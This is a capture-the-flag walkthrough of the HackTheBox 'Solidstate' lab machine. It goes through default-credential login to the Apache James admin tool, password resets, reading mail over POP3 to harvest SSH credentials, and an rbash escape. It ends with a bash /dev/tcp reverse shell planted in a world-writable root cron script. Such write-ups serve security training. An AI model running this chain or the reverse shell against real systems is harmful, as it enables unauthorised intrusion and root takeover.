0%

HackTheBox-Solidstate

Solidstate.

0x01信息收集

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
nmap -p- solidstate.htb

SYN Stealth Scan Timing: About 0.49% done
Nmap scan report for solidstate.htb (10.129.29.189)
Host is up (0.26s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
1
2
3
4
5
6
7
8
9
10
11
12
13
14
PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3?
119/tcp open nntp?
4555/tcp open rsip?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port:25

1
2
3
4

└──╼ #nc -v solidstate.htb 25
solidstate.htb [10.129.29.189] 25 (smtp) open
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Thu, 15 Apr 2021 02:07:51 -0400 (EDT)

Port:4555

The Port 4555 is JAMES Remote Administration Tool. So we can telent or nc this port.

default username and password: root:root

1
2
3
4
5
6
7
8
9
└──╼ #nc -v solidstate.htb 4555
solidstate.htb [10.129.29.189] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
1
2
3
4
5
6
7
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Reset Password & Login POP3 Check Mails

1
2
3
4
5
6
7
8
9
10
11
12
13
$ nc -v solidstate.htb 4555

setpassword james 123
Password for james reset
setpassword thomas 123
Password for thomas reset
setpassword john 123
Password for john reset
setpassword mindy 123
Password for mindy reset

quit
Bye

james

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ telnet solidstate.htb 110
Trying 10.129.29.189...
Connected to solidstate.htb.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
HELP
-ERR
USER james
+OK
PASS 123
+OK Welcome james
LIST
+OK 0 0
.
LIST 1
-ERR Message (1) does not exist.
quit

thomas

1
2
3
4
5
6
7
8
USER thomas
+OK
PASS 123
+OK Welcome thomas
LIST
+OK 0 0
.
quit

john

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$ telnet solidstate.htb 110
Trying 10.129.29.189...
Connected to solidstate.htb.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS 123
+OK Welcome john
LIST
+OK 1 743
1 743
.
LIST 1
+OK 1 743
RETR 1
+OK Message follows
Return-Path: <[email protected]>
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: [email protected]
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <[email protected]>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: [email protected]
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.

maybe The user mindy have something interesting ..

mindy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
$ telnet solidstate.htb 110
Trying 10.129.29.189...
Connected to solidstate.htb.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS 123
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <[email protected]>
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: [email protected]
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <[email protected]>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: [email protected]
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <[email protected]>
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: [email protected]
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <[email protected]>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: [email protected]
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: [email protected][email protected]

Respectfully,
James

.

mindy:[email protected][email protected]
OK.we got the password. now let’s try to log ssh.

1
2
3
4
5
6
7
8
9
10
11
12
13
ssh [email protected]
[email protected]'s password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
[email protected]:~$ id
-rbash: id: command not found

rbash..dammit. but we can easy bypass.

1
2
3
4
5
6
ssh [email protected] -t 'bash --noprofile'
[email protected]'s password:
${debian_chroot:+($debian_chroot)}[email protected]:~$ whoami
mindy
${debian_chroot:+($debian_chroot)}[email protected]:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

exploit-id

1
2
3
4
searchsploit JAMES 2.3.2

Apache James Server 2.3.2 - Insecure User Creation Arbitrary File | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py

we also could modfiy 35513.py paylod and then we could get the mindy bash shell too.

0x02 提权

when we login mindy, i use linpeas help me enum system.

1
2
3
4
5
6
[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/mindy
/opt/tmp.py

the /opt/tmp.py might be interesting

1
2
3
4
5
6
7
8
9
10
11
${debian_chroot:+($debian_chroot)}[email protected]:~$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()

${debian_chroot:+($debian_chroot)}[email protected]:~$ ls -lah /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py

looks like we can modify this python script file.

1
2
3
4
5
6
7
#!/usr/bin/env python
import os
import sys
try:
os.system('bash -c "bash -i >&/dev/tcp/10.10.16.69/1234 0>&1"')
except:
sys.exit()

Go have a cup of tea.

20210415-15:23:08-_EE4ktP_EE4ktP_EE4ktP_wqlPZG

if we use cron -l on root

1
2
# m h  dom mon dow   command
*/3 * * * * python /opt/tmp.py

This script will run every three minutes

参考文章